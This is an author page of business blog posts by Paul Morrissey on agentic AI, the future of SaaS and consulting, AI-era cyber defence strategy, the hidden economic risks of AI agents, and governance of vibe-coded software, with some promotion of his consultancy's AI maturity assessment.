Author: Paul Morrissey

  • From Software to Digital Colleagues: Why the Next Business Platform is Agentic AI

    From Software to Digital Colleagues: Why the Next Business Platform is Agentic AI

    Over the past decade I have written extensively about the rise of Software‑as‑a‑Service (SaaS) and how it reshaped the structure of the digital economy. In several earlier blogs I explored what I described as the “vulnerability of SaaS” in the emerging world of Agentic AI.

    At the time, some readers interpreted that argument as a criticism of SaaS itself.
    That was never the intention. SaaS was one of the most powerful technology and commercial innovations of the last twenty years. But every technology wave eventually becomes infrastructure for the next one. What we are now witnessing is precisely that transition.

    The shift underway is not simply about better software. It is about the emergence of digital workers – autonomous, AI‑driven agents capable of performing tasks, coordinating processes, and increasingly making operational decisions. In other words, we are moving from software that people use to systems where software itself does the work.

    This is the real meaning of Agentic AI. And if that trajectory continues – which the evidence increasingly suggests it will – the dominant commercial model will evolve from Software‑as‑a‑Service to something far more profound: Digital Workers‑as‑a‑Service.

    The End of the Software Interface Era

    To understand why this matters, we need to step back and look at how enterprise technology has evolved. For decades, enterprise software was designed around the assumption that a human user would sit at the centre of every process. Software provided the tools, dashboards, and workflows, while humans executed the tasks. SaaS refined that model brilliantly. Instead of installing complex enterprise systems, organisations subscribed to cloud platforms that were continuously updated, scalable, and relatively easy to integrate.

    • Salesforce transformed customer relationship management.
    • Workday modernised HR systems.
    • ServiceNow digitised enterprise workflows.

    But in every case the operating model remained the same: people used software. Agentic AI disrupts that assumption.

    In an agentic system, the software no longer waits for instructions.  It observes data, interprets goals, and executes actions autonomously.  Human involvement shifts from execution to supervision. The implication is profound: the primary “user” of enterprise systems may increasingly be another piece of software. When that happens, the entire design logic of SaaS begins to change.

    From Applications to Digital Labour

    What makes this moment particularly interesting is that we are already seeing early evidence of the transition. In China, logistics giants such as Alibaba and JD.com have deployed AI systems that autonomously optimise supply chain routing across thousands of delivery points in real time. The system continuously adjusts warehouse allocation, delivery routes, and inventory positioning without human intervention.

    In the financial sector, JPMorgan’s COiN platform analyses complex legal contracts using machine learning, performing in seconds tasks that previously required thousands of hours of manual legal work.

    Meanwhile, in Europe, telecommunications operators are increasingly deploying AI agents to manage network optimisation. Rather than engineers manually monitoring network performance, autonomous systems detect anomalies, predict congestion, and automatically adjust network parameters.

    Even in customer operations the shift is visible.
    Swedish fintech company Klarna recently reported that its AI assistant now performs work equivalent to hundreds of customer service agents, handling millions of conversations with customers across multiple markets.

    These examples are not isolated experiments.
    They represent early manifestations of a new organisational capability: digital labour. Lowering the Barrier to Adoption. Despite the promise, however, the deployment of agentic systems remains uneven. Research across global enterprises consistently shows that while organisations are experimenting heavily with AI, relatively few have managed to scale autonomous agents across their operations. The reasons are not difficult to understand. Building agentic systems requires a combination of capabilities that many organisations simply do not possess: data infrastructure, orchestration frameworks, governance models, and the ability to continuously train and monitor AI systems. This is precisely where a new commercial model begins to emerge. Instead of building digital workers internally, organisations can increasingly subscribe to them. In the same way that SaaS allowed businesses to consume software without managing infrastructure, Digital Workers‑as‑a‑Service allows organisations to deploy autonomous agents without building the underlying AI architecture themselves.

    The analogy with cloud computing is striking. Few companies today build their own data centres. Instead they rely on cloud providers such as Amazon Web Services, Microsoft Azure, or Google Cloud. The same dynamic is beginning to appear with agentic AI.

    Specialist providers are developing domain‑specific digital workers that can be deployed across industries: compliance agents, procurement agents, supply chain optimisation agents, and financial reconciliation agents. For smaller organisations in particular, this model dramatically lowers the barrier to entry. A mid‑sized manufacturer, for example, may never build an advanced AI operations platform internally.  But subscribing to a digital supply chain agent that continuously optimises production schedules is entirely feasible.

    New Business Models Emerge

    This is where the real strategic opportunity lies. In previous technology waves, the companies that dominated were those that recognised how to translate technical capability into scalable commercial models. Google and Amazon emerged from the early internet economy. Salesforce and ServiceNow defined the SaaS era. Agentic AI will produce its own generation of platform leaders. But the opportunity is not limited to technology companies. One of the most interesting possibilities is that organisations will begin to package their own operational expertise as digital workers. Consider a global logistics firm that has spent decades refining supply chain optimisation algorithms. Instead of simply using those capabilities internally, the company could offer autonomous logistics agents to other businesses as a service.

    A legal consultancy could deploy AI agents trained on its regulatory expertise to act as automated compliance advisors for smaller companies. A cybersecurity firm could provide continuous AI‑driven threat monitoring agents that operate across thousands of client networks simultaneously. In each case, the company is no longer selling software. It is selling operational capability. That distinction matters enormously.

    Governance and Trust

    Of course, the rise of digital workers also introduces new governance challenges. In earlier writing I have argued that AI governance must evolve beyond traditional IT risk management.  When organisations deploy autonomous agents capable of executing decisions, oversight frameworks must address transparency, accountability, and human supervision. Encouragingly, regulators and international organisations are already moving in this direction. The European Union’s AI Act establishes risk classifications for AI systems and mandates governance controls for high‑impact deployments. Similarly, the OECD and various industry bodies have developed frameworks for responsible AI deployment that emphasise auditability, human oversight, and ethical safeguards.

    In practice, organisations adopting digital workers will need new internal capabilities: AI supervision roles, model validation processes, and operational guardrails. Digital workers may perform tasks, but accountability will always remain human.

    Why Leaders Should Pay Attention Now

    One of the most consistent lessons in technology history is that early signals of structural change are often underestimated. Cloud computing initially appeared to be simply a more convenient way of delivering software. In reality it reshaped the economics of the entire technology sector. Agentic AI may prove to be an equally transformative shift.

    When digital workers become widely deployable through service models, the cost structure of organisations begins to change.  Routine operational tasks can be automated at scale, allowing human employees to focus on creativity, strategy, and complex decision‑making. Importantly, this does not imply the disappearance of human work.  Rather, it signals the emergence of hybrid organisations where human and digital workers collaborate.

    In many ways, the future enterprise may resemble a mixed workforce composed of people and autonomous systems working together. For business leaders, the strategic question is not whether this shift will occur. It is how quickly.

    Organisations that begin experimenting with agentic systems today will develop the operational knowledge needed to manage digital workforces tomorrow. Those that delay may find themselves competing against companies whose operational efficiency has been radically transformed by autonomous systems.

    Conclusion

    When I wrote about the vulnerability of SaaS in the age of Agentic AI, the argument was not that SaaS would disappear. Far from it. SaaS will remain a critical foundation of enterprise technology. But its role is changing. Instead of being the destination, SaaS increasingly becomes the infrastructure layer upon which autonomous digital workers operate. We are witnessing the emergence of a new organisational paradigm: the digital workforce. And just as cloud computing democratised access to computing power, Digital Workers‑as‑a‑Service may democratise access to advanced AI capability. If that happens, the next decade of business innovation will not simply be driven by better software. It will be driven by autonomous systems that work alongside us, augmenting human capability and reshaping how organisations operate. The companies that recognise this shift early will not just adopt new technology. They will redesign how work itself is done!

  • Beyond the Collapsing Pyramid

    Beyond the Collapsing Pyramid

    Why AI will make great consulting more valuable, not less — and why Bolgiaten’s AI Maturity Assessment is becoming an essential boardroom tool.

    The old consulting pyramid was built on leverage. The next generation of consulting will be built on judgment, governance, enterprise design, and the human leadership needed to turn AI from a tool into a transformation.

    For decades, the consulting business was built on a familiar structure: a broad base of junior analysts and associates feeding insight upward to a narrow band of partners and senior advisers. That model rewarded scale. Firms could deploy teams of smart graduates to gather data, build decks, perform benchmarking, document processes, and power the analysis behind recommendations. It was efficient, profitable, and deeply entrenched.

    Artificial intelligence is now breaking that structure apart.

    The market has been quick to notice the obvious part of the story: work once assigned to junior consultants can increasingly be completed faster, cheaper, and often more consistently by AI-enabled tools. Research synthesis, first-draft presentations, pattern recognition, market scanning, scenario generation, and parts of due diligence no longer require the same labor model they did even two years ago. In professional services, this is not a marginal productivity gain. It is a structural shock.

    Yet this is only half the truth. The deeper truth is more important for clients, advisers, and firms deciding what kind of business they want to become. The same force that is eroding the old consulting pyramid is creating a much larger market for a new kind of consultancy: one built on judgment, enterprise architecture, governance, change leadership, and the disciplined translation of AI capability into operating reality.

    This is the paradox at the heart of consulting’s AI moment. AI destroys low-level advisory work while simultaneously expanding the need for high-value advisory work.

    The New Scarcity Is Not Analysis. It Is Integration.

    The analytical scarcity that once justified large consulting teams is fading. What organizations increasingly lack is not information, but the ability to integrate AI safely, strategically, and at scale. Many enterprises now have pilots, proofs of concept, and isolated use cases. Far fewer have an enterprise-wide model that links AI strategy to governance, process redesign, workforce capability, data readiness, risk controls, and measurable commercial outcomes.

    That gap is where the next generation of consulting value sits.

    Recent global research points to the same conclusion from different angles. McKinsey has reported that while almost all companies are investing in AI, only a tiny minority describe themselves as genuinely mature in adoption, and the major barriers are leadership alignment, operating change, and scaling discipline rather than employee enthusiasm alone. NIST’s AI Risk Management Framework reinforces that AI deployment is not simply a technical issue but a governance and lifecycle challenge. The OECD’s AI Principles and its recent work on enterprise adoption likewise emphasize trustworthy governance, human-centered design, transparency, and capability-building as prerequisites for durable value creation. In Europe, the phased implementation of the EU AI Act is pushing organizations to translate AI ambition into documented controls, accountability, literacy, and risk-based operating practices.

    Taken together, these developments point to a simple reality: enterprises do not need more AI theatre. They need AI orchestration.

    This is why senior advisory work is becoming more valuable. The enterprise challenge is no longer “Can AI do this task?” It is now “How should this business redesign itself so that AI creates measurable value without creating unmanaged risk, fragmented workflows, regulatory exposure, or employee resistance?”

    That question cannot be answered by a chatbot alone.

    From Project Work to Enterprise Transformation

    The strongest global practice is moving beyond isolated use cases towards enterprise transformation. Leading organizations are not treating AI as a bolt-on technology layer. They are redesigning decision flows, clarifying governance, upgrading data foundations, defining accountable ownership, and investing in AI literacy across both executives and delivery teams.

    In practical terms, best practice now rests on six connected disciplines.

    First, strategy. High-performing organizations are explicit about where AI will create value and where it will not. They prioritize a small number of mission-critical business outcomes rather than chasing dozens of disconnected experiments.

    Second, operating model. AI needs a home inside the organization. That means clear sponsorship, role definition, investment logic, model ownership, and a decision-rights framework that prevents innovation from becoming chaos.

    Third, data and technology foundations. AI maturity is constrained by the quality, accessibility, and governance of enterprise data. No amount of enthusiasm compensates for poor metadata, fragmented systems, or weak integration architecture.

    Fourth, governance and trust. Responsible AI is no longer a compliance side note. It is a business requirement. Firms need controls around model risk, human oversight, security, auditability, third-party tools, and policy compliance. This is especially urgent for regulated sectors and for organizations operating across jurisdictions.

    Fifth, workforce and change. The organizations that succeed treat AI adoption as a human transformation. They redesign roles, reallocate work, retrain managers, and engage employees early. Change management is not the packaging around the transformation; it is the transformation.

    Sixth, value realization. Mature adopters define metrics in advance. They measure cycle-time reduction, cost-to-serve, quality uplift, revenue impact, risk reduction, and adoption depth. Without this discipline, AI becomes another innovation story rather than a business result.

    Every one of these domains is advisory-intensive. None can be solved by technology procurement alone. This is why consulting is not disappearing. It is being re-priced around deeper capability.

    Why the Old Pyramid Is Collapsing

    The traditional consulting pyramid assumed that clients would continue paying for labor-intensive analytical assembly. That assumption no longer holds. If AI can compress work that once took five analysts and two weeks into a few hours of guided review, then the economics of leverage change dramatically. Clients will be less willing to fund armies of junior staff producing outputs that can now be generated, compared, and refined by machines.

    This does not mean junior talent becomes irrelevant. It means the apprenticeship model must change. Tomorrow’s consultants will need stronger problem framing, industry context, facilitation, governance awareness, and data fluency much earlier in their careers. The premium will shift away from producing slides and toward shaping decisions.

    For consulting firms, this creates a stark strategic choice. They can defend the old model and watch margins erode, or they can redesign around senior expertise, domain-led teams, AI-enabled delivery, and repeatable transformation frameworks. The winners will not be those with the largest bench. They will be those with the clearest method for helping clients move from experimentation to enterprise maturity.

    The Bolgiaten Proposition: AI Maturity Assessment as a Strategic Entry Point

    This is exactly why Bolgiaten’s AI Maturity Assessment is not a nice-to-have diagnostic. It is an essential executive instrument.

    Most enterprises are currently trapped between ambition and execution. Boards want AI value. Business units want faster tools. Risk teams want assurance. IT wants standardization. HR worries about capability and workforce impact. Legal and compliance want clarity on obligations. Everyone is right, but very few organizations have a common picture of where they actually stand.

    An AI Maturity Assessment solves that problem.

    At its best, such an assessment gives leadership a clear, evidence-based view of current capability across the dimensions that matter most: strategy, governance, data readiness, technology architecture, operating model, workforce capability, responsible AI controls, and value realization. It reveals where the enterprise is genuinely ready, where it is exposed, where investment should be prioritized, and what sequence of actions will unlock scale.

    For Bolgiaten, this creates a compelling market proposition.

    First, it establishes a trusted advisory entry point. Instead of selling abstract AI transformation, Bolgiaten can begin with a structured diagnosis grounded in enterprise reality.

    Second, it converts uncertainty into a roadmap. Clients do not simply receive a score; they receive a staged transformation pathway tied to business outcomes, risk posture, and organizational readiness.

    Third, it creates board-level relevance. AI has now moved into the language of competitiveness, resilience, compliance, and workforce redesign. An assessment translates technical noise into executive decisions.

    Fourth, it opens downstream consulting opportunities. Once maturity gaps are visible, the follow-on demand becomes clear: governance frameworks, operating model redesign, use-case prioritization, AI policy development, vendor evaluation, workforce capability building, and enterprise change management.

    In other words, the assessment is both a client value tool and a consultancy growth engine.

    Why This Is a Massive Consultancy Opportunity

    The opportunity is massive because nearly every medium and large enterprise now needs the same sequence of support. They need to understand their AI maturity. They need to prioritize use cases. They need to redesign processes. They need to establish governance. They need to upskill leaders and teams. They need to embed trust, compliance, and accountability. And they need to prove measurable value.

    That demand is horizontal across industries and vertical within them. Financial services, telecoms, public sector, logistics, infrastructure, energy, health, and professional services all face the same core challenge: AI cannot remain a pilot portfolio. It must become an enterprise capability.

    This is precisely the territory where seasoned consulting earns its keep. The work is cross-functional, politically sensitive, operationally complex, and deeply human. It requires facilitation, judgment, pattern recognition, and the ability to move senior stakeholders from fragmented enthusiasm to coordinated action.

    That is why the future consultancy will look different. It will be smaller at the base, stronger at the center, and far more valuable at the top. It will use AI aggressively in delivery, but it will sell wisdom, not labor. It will package diagnostics, roadmaps, governance architectures, and transformation methods. It will blend technology fluency with organizational design and change capability.

    The Bottom Line

    The consulting industry is not facing extinction. It is facing selection.

    The firms under pressure are those still organized around work that AI now performs adequately. The firms that will grow are those that understand AI as a force that raises the premium on human judgment. As analytical work becomes automated, the value migrates upward to synthesis, leadership, architecture, governance, and change.

    The pyramid is collapsing. But what rises from its foundations will be something more strategic and more durable: a professional services model built not on scale, but on wisdom; not on volume, but on vision.

    And in that new model, tools such as Bolgiaten’s AI Maturity Assessment will become indispensable. They provide the starting point every serious enterprise now needs: an honest view of readiness, a practical route to maturity, and a disciplined bridge from AI ambition to enterprise performance.

    That is not simply a service offering. It is the gateway to the next great consultancy market.

    Bolgiaten Offer a free one hour consultation with Professor Paul Morrissey to discuss this and other related AI issues across your organization please send a request to PJM@bolgiaten.com

  • Rethinking Cyber Defense Across Multiple Attack Surfaces

    Rethinking Cyber Defense Across Multiple Attack Surfaces

    Whenever technology evolves, cyber threats evolve alongside it. The arrival of autonomous and agentic artificial intelligence is accelerating that evolution in ways that many organisations are only beginning to understand. The real shift is not simply the automation of attacks, but the emergence of penetration at scale across multiple attack surfaces.

    In practical terms, this means attackers will increasingly be able to automate the entire attack cycle—from reconnaissance and vulnerability discovery to credential compromise, data extraction, and deception-based intrusion. AI systems can simultaneously probe identities, applications, networks, cloud environments and human decision-makers. The result is not a single attack vector but a coordinated campaign that unfolds across an organisation’s entire digital ecosystem.

    This represents a profound departure from the traditional model of cyber intrusion. Historically, human attackers focused their attention on a limited number of targets, investing time in reconnaissance before launching an intrusion. Artificial intelligence changes that equation dramatically. Autonomous tools can continuously scan for vulnerabilities across thousands or millions of potential targets, learning from each interaction and refining their approach in real time.

    The implication is clear: the future threat environment is defined by scale, persistence and simultaneous pressure across multiple attack surfaces.

    Penetration at AI Scale

    Human cybercriminals have historically been constrained by time and operational capacity. Identifying vulnerable systems, crafting convincing phishing campaigns, or attempting credential theft required careful manual effort. AI-enabled systems remove many of these constraints.

    Autonomous tools can perform reconnaissance continuously, mapping attack surfaces across identities, APIs, cloud infrastructure, and enterprise systems. They can generate and test thousands of phishing messages, automatically adapt social engineering techniques, and exploit exposed credentials within minutes of discovery.

    The attack does not occur in a single place. Instead, it unfolds across multiple surfaces simultaneously:

    • Identity systems such as authentication platforms and privileged accounts
    • Cloud infrastructure and software-as-a-service environments
    • APIs and interconnected digital services
    • AI models and data pipelines themselves
    • Human users targeted through increasingly convincing deception

    This is what penetration at scale looks like: not one entry point, but many potential openings tested continuously until one succeeds.

    And once access is achieved, AI-driven tools may accelerate lateral movement, privilege escalation and data discovery far more quickly than human attackers could manage. Sensitive data can be identified, aggregated and exfiltrated automatically, while malicious software can be inserted to enable future exploitation.

    At the same time, organisations themselves are rapidly deploying AI agents across their operations—from customer service and internal knowledge management to supply chains and decision support. While these systems deliver clear efficiency gains, they also introduce new vulnerabilities and attack surfaces that traditional cybersecurity frameworks were not designed to address.

    In particular, researchers have highlighted the risk of prompt injection attacks, data poisoning, model manipulation and agent misalignment. These vulnerabilities allow malicious actors to manipulate AI systems themselves, turning internal automation tools into potential attack vectors.

    In short, the defensive environment is becoming more complex at the same moment that offensive capability is becoming more automated.

    A New Cybersecurity Landscape

    We are therefore entering a new phase of cybersecurity where defence must operate at the same scale and speed as AI-enabled threats. Reactive models of cybersecurity—where incidents are analysed and mitigated after detection—will increasingly struggle to keep pace with automated attacks unfolding in real time.

    Governments and regulators are already recognising this shift. Emerging initiatives such as AI risk management frameworks, secure AI system development guidance, and new cybersecurity standards are being developed to help organisations manage these risks. The direction of travel is clear: cybersecurity must become more proactive, predictive and resilient.

    For businesses, this means developing a cybersecurity playbook designed specifically for the AI era.

    A Cybersecurity Playbook for the Agentic Era

    Every organisation should now be developing a strategic framework that prepares it for penetration attempts occurring simultaneously across multiple attack surfaces.

    The first element of such a playbook is governance. Organisations deploying AI systems must implement clear policies defining how those systems operate, what data they can access, and how their actions are monitored. Robust identity and access management is essential, alongside detailed logging and audit mechanisms capable of tracking both human and machine decision-making.

    Second, incident response strategies must evolve. Traditional response processes assume that human analysts investigate threats and then take action. When attacks unfold at machine speed, that model becomes increasingly impractical.

    Defensive systems will need automated containment capabilities capable of isolating compromised services, revoking credentials, and limiting lateral movement in real time. This raises an important governance question for leadership teams: when should automated systems be authorised to take disruptive action in order to protect the organisation?

    In many cases, cybersecurity platforms will need authority to shut down systems or restrict operations temporarily to prevent wider compromise. Determining where those boundaries lie will become a critical leadership decision in the coming years.

    Third, organisations must prioritise workforce awareness. AI-powered deception techniques—including deepfake audio, synthetic video, and highly personalised phishing—are becoming increasingly sophisticated. Security awareness cannot remain confined to IT departments; it must become a universal organisational capability.

    Employees need training to recognise emerging forms of manipulation and to understand the role they play in maintaining cyber resilience. Just as importantly, training programmes must evolve continuously as new attack techniques emerge.

    Finally, organisations must remain aligned with emerging standards and frameworks. Cybersecurity policies that remain static will rapidly become obsolete in a rapidly evolving threat environment. Continuous review against global best practices ensures that defensive strategies remain current.

    The Strategic Message

    If there is one central message for business leaders, it is this: the emergence of AI-enabled penetration at scale across multiple attack surfaces represents more than simply another cybersecurity threat.

    It represents a transformation of the entire threat landscape.

    Defensive strategies built for a slower, more predictable era of cyber intrusion are no longer sufficient. Organisations must now prepare for a world in which attacks occur continuously, adapt dynamically, and operate simultaneously across infrastructure, software, identities, data and human behaviour.

    In such an environment, cybersecurity resilience depends not only on stronger tools but on stronger strategy.

    The organisations that succeed will be those that recognise the scale of this transformation early, rethink their security playbooks, and build defences capable of operating at the same speed and scale as the threats they face.

  • The Hidden Risks of Unsupervised AI Agents

    The Hidden Risks of Unsupervised AI Agents

    Why the Real Economic Impact of AI Is Harder to Measure Than You Think.

    Over the past year I have had many conversations with executives, board members, and investors about Agentic AI and the profound changes it promises to bring to organisations. The tone of these discussions is usually enthusiastic, and understandably so.

    We are told that AI agents will unlock new revenue streams, dramatically increase productivity, and automate complex workflows across the enterprise. Marketing teams expect faster campaign creation, customer service leaders expect 24-hour support automation, finance departments expect automated reconciliation, and operations teams expect continuous optimisation. In short, everyone is focused on the upside.

    But there is a question I often ask in boardrooms and strategy sessions that tends to bring the conversation to a pause:

    How do you actually measure the real economic value of AI?

    Because while everyone is excited about the promise of increased revenue and operational efficiency, far fewer organisations are measuring the full economic impact of AI — including the hidden risks that come with deploying autonomous or semi-autonomous AI agents. And those risks can be significant.

    The Problem with Simplistic ROI Thinking

    Most AI business cases presented to CFOs follow a predictable format.

    They focus on two numbers:

    1. Revenue growth
    2. Operational efficiency

    This is a reasonable starting point. AI can absolutely help organisations generate new revenue opportunities and reduce operational costs. But it is only part of the picture. What is often missing from these models is a third and much more complex factor: Intangible Benefits. (IB)

    These can be positive — such as improved customer experience, faster innovation, or stronger competitive positioning.

    But they can also be negative, — And when negative intangibles occur in the context of AI systems, they can escalate quickly. Before discussing those risks, it helps to introduce a simple framework I often use when discussing AI economics with executive teams.

    A Practical Metric for Measuring AI Value

    One way to frame the discussion with finance leaders — particularly the CFO, who is usually the most sceptical person in the room — is to express the impact of AI in terms of Economic Impact  (EI) relative to the organisation’s financial scale.

    The metric I use is the following:

    Economic Impact (EI) = (Revenue + Efficiency + Intangible Benefits) / EBITDAR

    Where:

    • Δ Revenue represents the incremental revenue generated by AI initiatives (Use Cases)
    • Δ Efficiency represents measurable improvements in productivity or cost reduction
    • Intangible Benefits (IB) capture both positive and negative strategic effects
    • EBITDAR represents Earnings Before Interest, Taxes, Depreciation, Amortisation and Restructuring (or Rent), which effectively normalises the organisation’s operating scale

    Why divide by EBITDAR?

    Because doing so contextualises the Economic Impact (EI) relative to the size of the organisation. A £5 million efficiency gain means something very different to a company with £20 million EBITDAR than it does to one with £500 million.

    This framework gives the CFO a common financial language in which to evaluate AI initiatives. But the most important component of the equation is the one that is most frequently ignored. Intangible Benefits. (IB)

    The Hidden Side of Intangible Benefits (IB)

    When organisations present AI initiatives internally, intangible benefits are usually framed in positive terms:

    • improved decision-making
    • faster response times
    • enhanced customer experiences
    • stronger brand perception

    All of these are real.

    However, what is often underestimated are the negative intangible impacts that can emerge from poorly supervised AI systems. Particularly when organisations begin deploying autonomous AI agents.

    AI agents are powerful because they can act independently — analysing information, making decisions, and executing tasks across multiple systems. But autonomy without governance creates new categories of risk.

    Three deserve careful attention.

    1. Data Leakage

    AI systems depend heavily on data.

    When those systems are connected to internal knowledge bases, customer records, contracts, or intellectual property, the risk of data leakage becomes significant.

    This can occur in multiple ways:

    • sensitive data being exposed through prompts or responses
    • proprietary information being incorporated into external models
    • confidential customer data being accessed or transmitted improperly

    The consequences can range from regulatory breaches to loss of competitive advantage. In highly regulated sectors — such as telecommunications, healthcare, or finance — the reputational damage alone can be considerable.

    2. Hallucination and Customer Trust

    Large language models and AI agents can sometimes generate hallucinations — confident but incorrect responses.

    In internal workflows this may simply create inefficiencies.

    In customer-facing systems, however, the consequences can be more serious.

    Imagine an AI agent:

    • giving incorrect billing information
    • misrepresenting product capabilities
    • generating misleading compliance guidance

    The immediate impact is poor customer experience. But the deeper issue is trust erosion.

    Trust, once lost, is extremely difficult to rebuild.

    3. Model Drift

    AI systems are not static.

    Over time, models can experience drift — where their behaviour gradually deviates from expected performance.

    This may occur because:

    • the underlying data environment changes
    • feedback loops alter model behaviour
    • system updates introduce unintended bias or errors

    If drift is not detected early, the organisation may continue operating under the assumption that AI outputs remain accurate. In reality, decision quality may already be deteriorating.

    Reputation: The Fragile Asset

    When organisations discuss AI benefits, they often overlook the fact that reputation is one of the most valuable assets any company possesses.

    And reputation behaves asymmetrically. One bad event can wipe out thousands of positive interactions. I often summarise it in very simple terms:

    One negative event can wipe out 10,000 positive ones.

    In the context of AI, this could be:

    • a widely reported data breach
    • an AI-generated decision perceived as unethical
    • a discriminatory algorithmic outcome
    • a regulatory violation resulting from automated decision-making

    These events do not just affect operations. They affect brand trust, customer loyalty, regulatory scrutiny, and investor confidence. All of which belong squarely within the Intangible Benefits (IB) component of the economic impact equation.

    Why Governance Matters

    None of this should be interpreted as an argument against AI. Far from it.

    AI will undoubtedly become one of the most powerful productivity tools organisations have ever deployed. But the organisations that succeed will not simply deploy AI faster than others. They will deploy it more responsibly and more intelligently.

    That means introducing:

    • strong AI governance frameworks
    • human oversight for critical decisions
    • continuous model monitoring
    • robust data protection mechanisms
    • clear ethical guidelines for AI deployment
    •  

    In other words, AI should augment human judgement — not replace it entirely.

    The Conversation CFOs Need to Have

    Whenever I present the Economic Impact (EI) equation to executive teams, I emphasise one point. The equation is not just a financial model. It is a governance conversation.

    It forces leadership teams to ask:

    • What new revenue can AI truly create?
    • What measurable efficiencies will it deliver?
    • What positive intangible benefits will it generate?
    • And critically, what negative intangible risks might it introduce?

    Only by considering all four elements together can organisations measure the true economic value of AI. Because if the numerator in the equation includes hidden risks that no one is monitoring, the apparent economic impact may be overstated.

    And when those risks materialise, the consequences can be sudden and severe.

    Final Thoughts

    AI agents will undoubtedly transform how organisations operate. They will create extraordinary opportunities for automation, innovation, and growth. But as with all powerful technologies, the benefits must be balanced with careful governance and realistic economic measurement. The organisations that thrive in the AI era will not be those that chase automation blindly. They will be those that understand both the upside and the downside and measure the true economic impact accordingly.

    Why This Thinking Matters in AI Readiness.

     This type of thinking is precisely why I developed my AI Readiness Assessment methodology. Too many organisations approach AI adoption as a technology deployment exercise rather than a strategic capability transformation.

    The purpose of the AI Readiness Assessment is to help organisations understand:

    • where they currently stand with AI maturity
    • how strong their governance and risk frameworks are
    • whether their data foundations are ready for AI deployment
    • how AI initiatives can be measured in terms of real economic impact

    More importantly, it allows organisations to design an AI journey that is measurable, risk-aware, and sustainable. In other words, it helps organisations capture the upside of AI while ensuring the hidden risks — the ones that often sit inside the “Intangible Benefits” component of the equation — are properly understood and managed.

    Because the real challenge of AI is not deploying it.

    The real challenge is deploying it responsibly, strategically, and in a way that strengthens the organisation rather than exposing it to unnecessary risk.

  • When Vibe Coding Meets the Real World: Security, Governance and the Rise of S2aaS

    When Vibe Coding Meets the Real World: Security, Governance and the Rise of S2aaS

    The question is no longer whether AI can generate code. It clearly can. The real question is whether “vibe coded” products can be trusted, governed and secured well enough to be taken seriously inside an enterprise.

    Over the past year, tools such as Claude, OpenAI, Gemini and others have dramatically lowered the barrier to software creation. What many are now calling vibe coding allows founders, product teams and even non-engineers to produce working applications at remarkable speed. Prototypes that once took months can now appear in hours. That is genuinely transformative.

    But it also creates a dangerous illusion. The ability to generate software quickly is not the same as the ability to create software that is secure, resilient, compliant and enterprise ready. In fact, the faster code is created, the more important governance becomes. The risk is not that AI-generated code fails to compile. The risk is that it appears to work while hiding weaknesses that only emerge later under attack, under regulation, or under enterprise scrutiny.

    Where the problem begins

    This is where vibe coding may hit the rocks. Not because the model cannot write code, but because code alone is only one small part of software assurance. Enterprise-grade products require secure architecture, identity controls, dependency management, auditability, testing discipline, provenance, data governance, model risk controls, human accountability and clear operational ownership. None of that is guaranteed simply because an AI assistant can generate a neat application layer.

    Global best practice is already pointing in this direction. NIST’s Secure Software Development Framework profile for generative AI makes clear that AI-assisted development still requires disciplined secure development, validation and supply-chain control. The Open Worldwide Application Security Project (OWASP’s) work on LLM application risk highlights issues such as prompt injection, insecure output handling, data leakage and supply-chain vulnerabilities. The UK’s guidance on secure AI system development and its recent Software Security Code of Practice push the same message: security must be designed in, not bolted on afterwards.

    That matters commercially. A great many AI-generated products and services being built today are exciting, useful and investable at the prototype stage, but they are not yet enterprise ready in the full sense of the term. They may lack code provenance, robust access control, explainable governance, secure deployment patterns, red-team testing, policy enforcement and evidence that they can survive procurement due diligence. In other words, there is a widening gap between AI-enabled software creation and enterprise-grade software assurance.

    Why S2aaS could matter

    That gap is precisely where an opportunity emerges. I believe there is a growing market for a Secure Software as a Service model — S2aaS — sitting above or alongside the current generation of agentic and SaaS platforms. The proposition would not simply be to host software, nor merely to generate it faster, but to wrap AI-enabled product development in a governed, continuously monitored, policy-driven security and assurance layer. This would include secure coding controls, architectural review, software bill of materials, vulnerability scanning, secrets management, model governance, compliance mapping, runtime monitoring and board-level assurance reporting.

    In practical terms, S2aaS could become the trust fabric for the vibe coding economy. Start-ups could build at speed, but within a managed security and governance envelope. Mid-sized firms could adopt AI-generated internal tools without carrying the full burden of building a mature software assurance capability themselves. Large enterprises could accelerate innovation while retaining procurement-grade evidence, audit trails and risk visibility. Regulators and boards would be more likely to support innovation if they can see that clear control frameworks exist around it.

    Beyond Agentic AI versus SaaS

    This is also why the debate between Agentic AI and traditional SaaS may be missing a deeper point. The next battleground may not simply be who automates more work. It may be who can deliver trusted automation at scale. In that world, S2aaS starts to look less like a niche service and more like SaaS 2.0: software delivery fused with security, governance, compliance and assurance by design.

    My conclusion

    My conclusion is therefore straightforward. Vibe coding is real, powerful and economically important. But on its own it is not enough for serious enterprise deployment. The winners in the next phase of the market may not be those who generate the most code the fastest. They may be the organisations that make AI-generated software trustworthy, governable and insurable. That is where value migrates once the first excitement fades.

    So yes, I believe there is an opportunity here. The space between AI-generated software and enterprise trust is not a minor implementation issue. It is a strategic market gap. And for advanced security and governance organisations prepared to package that capability as a service, S2aaS could prove to be one of the most important commercial categories to emerge from the age of AI-assisted software development.

    Reference points informing the argument

    • NIST SP 800-218A, Secure Software Development Practices for Generative AI and Dual-Use Foundation Models (2024).

    • NIST AI Risk Management Framework (AI RMF).

    • OWASP Top 10 for LLM Applications 2025.

    • NCSC / CISA / partner agencies: Guidelines for Secure AI System Development.

    • UK Government, Code of Practice for the Cyber Security of AI (2025).

    • UK Government, Software Security Code of Practice (2026).

    • European Commission, General-Purpose AI Code of Practice (2025).

  • Agentic AI vs SaaS: Is This the Beginning of the End — or the Next Evolution?

    Agentic AI vs SaaS: Is This the Beginning of the End — or the Next Evolution?

    Over the past few months, I have been asked the same provocative question again and again: “Will Agentic AI be the nail in the coffin for SaaS?” It’s a good question. But I think it’s the wrong one.

    The real question is this: Will Agentic AI expose which SaaS companies actually own real value — and which ones were simply renting convenience in the cloud? For the past two decades SaaS has been one of the most successful business models in technology.

    Subscription revenue, predictable cash flow, scalable delivery, and strong margins made it incredibly attractive to founders and investors alike. But a large portion of SaaS value has historically been built around user interfaces, workflow routing, dashboards, form entry and seat-based licences. In other words, SaaS often organised work rather than actually doing the work.

    Agentic AI changes that equation.

    Agentic AI systems can plan, execute and manage multi-step workflows autonomously. Instead of humans navigating multiple software tools, AI agents can increasingly complete the task themselves — resolving support tickets, updating CRM records, generating reports, reconciling invoices, or coordinating procurement processes. In short, the interface layer that defined much of SaaS may no longer be the Centre of gravity. That doesn’t mean SaaS disappears. But it does mean the economic model behind many SaaS companies is now under scrutiny.

